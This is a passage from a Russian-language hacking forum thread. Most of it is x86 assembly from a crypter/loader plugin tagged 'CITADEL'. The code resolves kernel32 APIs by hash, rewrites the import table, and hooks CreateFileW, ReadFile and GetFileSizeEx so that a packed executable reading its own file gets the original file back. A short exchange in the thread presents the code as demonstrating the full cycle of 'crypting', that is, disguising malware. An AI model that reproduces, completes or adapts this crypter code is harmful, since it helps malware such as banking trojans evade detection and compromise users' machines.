         mov     ecx, [nNumberOfBytesToRead]
         mov     esi, [esi+_LOADPE_DATA.pOriginalFile]
         cld
         rep     movsb
         mov     eax, [lpNumberOfBytesRead]
         mov     edx, [nNumberOfBytesToRead]
         mov     DWord [eax], edx
         mov     eax, [ebx+_ReadFile]
         mov     edx, [ebx+pIAT_ReadFile]
         mov     DWord [edx], eax
         stdcall DWord [ebx+_SetLastError], 0x0
         xor     eax, eax
         inc     eax
         jmp     short .end
    .readOriginal:
         stdcall DWord [esi+_ReadFile], [hFile], [lpBufer], [nNumberOfBytesToRead], [lpNumberOfBytesRead], [lpOverlapped]
    .end:
         mov     DWord [esp+0x1C], eax
         popa
         ret
    endp
    
    proc CreateFileW_Hook lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile
         pusha
         call    .delta
    .delta:
         pop     esi     
         sub     esi, .delta-_PLUGIN_BEGIN_
         stdcall DWord [esi+_CreateFileW], [lpFileName], [dwDesiredAccess], [dwShareMode], [lpSecurityAttributes], [dwCreationDisposition], [dwFlagsAndAttributes], [hTemplateFile]
         mov     DWord [esp+0x1C], eax
         stdcall DWord [esi+_lstrcmpiW], [lpFileName], [esi+pExecutableFileName]
         test    eax, eax
         jnz     .end
         push    DWord [esp+0x1C]
         pop     DWord [esi+hFileExec]
         mov     eax, [esi+_CreateFileW]
         mov     edx, [esi+pIAT_CreateFileW]
         mov     DWord [edx], eax
    .end:
         popa
         ret
    endp
    
    proc GetFileSizeEx_Hook hFile, lpFileSize
         pusha
         call    .delta
    .delta:
         pop     ebx
         sub     ebx, .delta-_PLUGIN_BEGIN_
         mov     eax, DWord [ebx+hFileExec]
         test    eax, eax
         jz      .readOriginal
         cmp     eax, [hFile]
         jnz     .readOriginal
         xor     edi, edi
         mov     eax, [ebx+_GetFileSizeEx]
         mov     edx, [ebx+pIAT_GetFileSizeEx]
         mov     DWord [edx], eax
         mov     edx, [lpFileSize]
         mov     eax, DWord [ebx+_3B1P_PLUGIN_HEADER.pLoadPEData]
         mov     eax, [eax+_LOADPE_DATA.dwOriginalFileSize]
         mov     DWord [edx], eax
         mov     DWord [edx+0x4], edi
         stdcall DWord [ebx+_SetLastError], 0
         inc     edi
         xchg    edi, eax
         jmp     short .end
    .readOriginal:
         stdcall DWord [ebx+_GetFileSizeEx], [hFile], [lpFileSize]
    .end:
         mov     DWord [esp+0x1C], eax
         popa
         ret
    endp
    
    proc searchDWordValue pMem, dwSize, dwValue
         pusha
         mov     esi, [pMem]
         mov     eax, [dwValue]
         mov     ecx, [dwSize]
    .up:
         test    ecx, ecx
         jz      .error
         cmp     DWord [esi], eax
         jz      .found
         sub     ecx, 0x4
         add     esi, 0x4
         jmp     short .up
    .found:
         clc
         jmp     short .end
    .error:
         xor     esi, esi
         stc
    .end:
         mov     DWord [esp+0x1C], esi
         popa
         ret
    endp
    
    pExecutableFileName dd 0x0
    hFileExec dd 0x0
    dwOldProtect dd 0x0
    _ReadFile dd 0x0
    _CreateFileW dd 0x0
    _lstrcmpiW dd 0x0
    _SetLastError dd 0x0
    _GetFileSizeEx dd 0x0
    
    ;IAT addresses
    pIAT dd 0x0
    dwIATsize dd 0x0
    pIAT_CreateFileW dd 0x0
    pIAT_ReadFile dd 0x0
    pIAT_GetFileSizeEx dd 0x0
    
    start:
         xor     ebx, ebx
         mov     eax, DWord [fs:ebx+0x30]
         mov     eax, DWord [eax+0xC]
         mov     eax, DWord [eax+0xC]
         mov     eax, [eax+0x28]
         mov     DWord [esi+pExecutableFileName], eax
    ;     mov     eax, DWord [edi+_LOADPE_DATA.pPEFileHeader]
         stdcall DWord [edi+_LOADPE_DATA.pAltGetProcAddress], edi, DWord [edi+_LOADPE_DATA.hKernel32], DWord [edi+_LOADPE_DATA.pCompareHash], hashReadFile
         mov     DWord [esi+_ReadFile], eax
         stdcall DWord [edi+_LOADPE_DATA.pAltGetProcAddress], edi, DWord [edi+_LOADPE_DATA.hKernel32], DWord [edi+_LOADPE_DATA.pCompareHash], hashCreateFileW
         mov     DWord [esi+_CreateFileW], eax
         stdcall DWord [edi+_LOADPE_DATA.pAltGetProcAddress], edi, DWord [edi+_LOADPE_DATA.hKernel32], DWord [edi+_LOADPE_DATA.pCompareHash], hashlstrcmpiW
         mov     DWord [esi+_lstrcmpiW], eax
         stdcall DWord [edi+_LOADPE_DATA.pAltGetProcAddress], edi, DWord [edi+_LOADPE_DATA.hKernel32], DWord [edi+_LOADPE_DATA.pCompareHash], hashSetLastError
         mov     DWord [esi+_SetLastError], eax
         stdcall DWord [edi+_LOADPE_DATA.pAltGetProcAddress], edi, DWord [edi+_LOADPE_DATA.hKernel32], DWord [edi+_LOADPE_DATA.pCompareHash], hashGetFileSizeEx
         mov     DWord [esi+_GetFileSizeEx], eax
         stdcall DWord [edi+_LOADPE_DATA.pGetFileHeader], DWord [edi+_LOADPE_DATA.dwImageBase]
         add     eax, sizeof.IMAGE_FILE_HEADER + IMAGE_OPTIONAL_HEADER32.DataDirectory + IMAGE_DIRECTORY_ENTRY_IAT*0x8
         cmp     DWord [eax], 0x0
         jz      .end
         mov     edx, DWord [eax]
         add     edx, [edi+_LOADPE_DATA.dwImageBase]
         mov     DWord [esi+pIAT], edx
         push    DWord [eax+0x4]
         pop     DWord [esi+dwIATsize]
         lea     eax, [esi+dwOldProtect]
         stdcall DWord [edi+_LOADPE_DATA.pVirtualProtect], DWord [esi+pIAT], DWord [esi+dwIATsize], PAGE_EXECUTE_READWRITE, eax
         stdcall searchDWordValue, DWord [esi+pIAT], DWord [esi+dwIATsize], DWord [esi+_CreateFileW]
         jc      .end
         mov     DWord [esi+pIAT_CreateFileW], eax
         lea     edx, [esi+CreateFileW_Hook]
         mov     DWord [eax], edx
         stdcall searchDWordValue, DWord [esi+pIAT], DWord [esi+dwIATsize], DWord [esi+_ReadFile]
         jc      .end
         mov     DWord [esi+pIAT_ReadFile], eax
         lea     edx, [esi+ReadFile_Hook]
         mov     DWord [eax], edx
         stdcall searchDWordValue, DWord [esi+pIAT], DWord [esi+dwIATsize], DWord [esi+_GetFileSizeEx]
         jc      .end
         mov     DWord [esi+pIAT_GetFileSizeEx], eax
         lea     edx, [esi+GetFileSizeEx_Hook]
         mov     DWord [eax], edx
    
    
    .end:
         jmp     DWord [esi+_3B1P_PLUGIN_HEADER.pReturn]
    
    __3BIP_PLUGIN_TAIL__ 'CITADEL'
    
     

    Вложения:

    • Like Like x 3
    Метки:
  2. AJ1

    AJ1

    Регистрация:
    19 фев 2013
    Сообщения:
    246
    Симпатии:
    351
    Как там на replace дела, альсо? :D
     
  3. TopicStarter Overlay
    0xDADA11C7

    0xDADA11C7

    Регистрация:
    5 янв 2015
    Сообщения:
    8
    Симпатии:
    23
    Проект растет, я модератор раздела системного программирования и выложил кошерные кодесы (по словам Please login or register to view links c даманги), наглядно показываюшие полный "технологический цикл" криптования.
     

Поделиться этой страницей

Загрузка...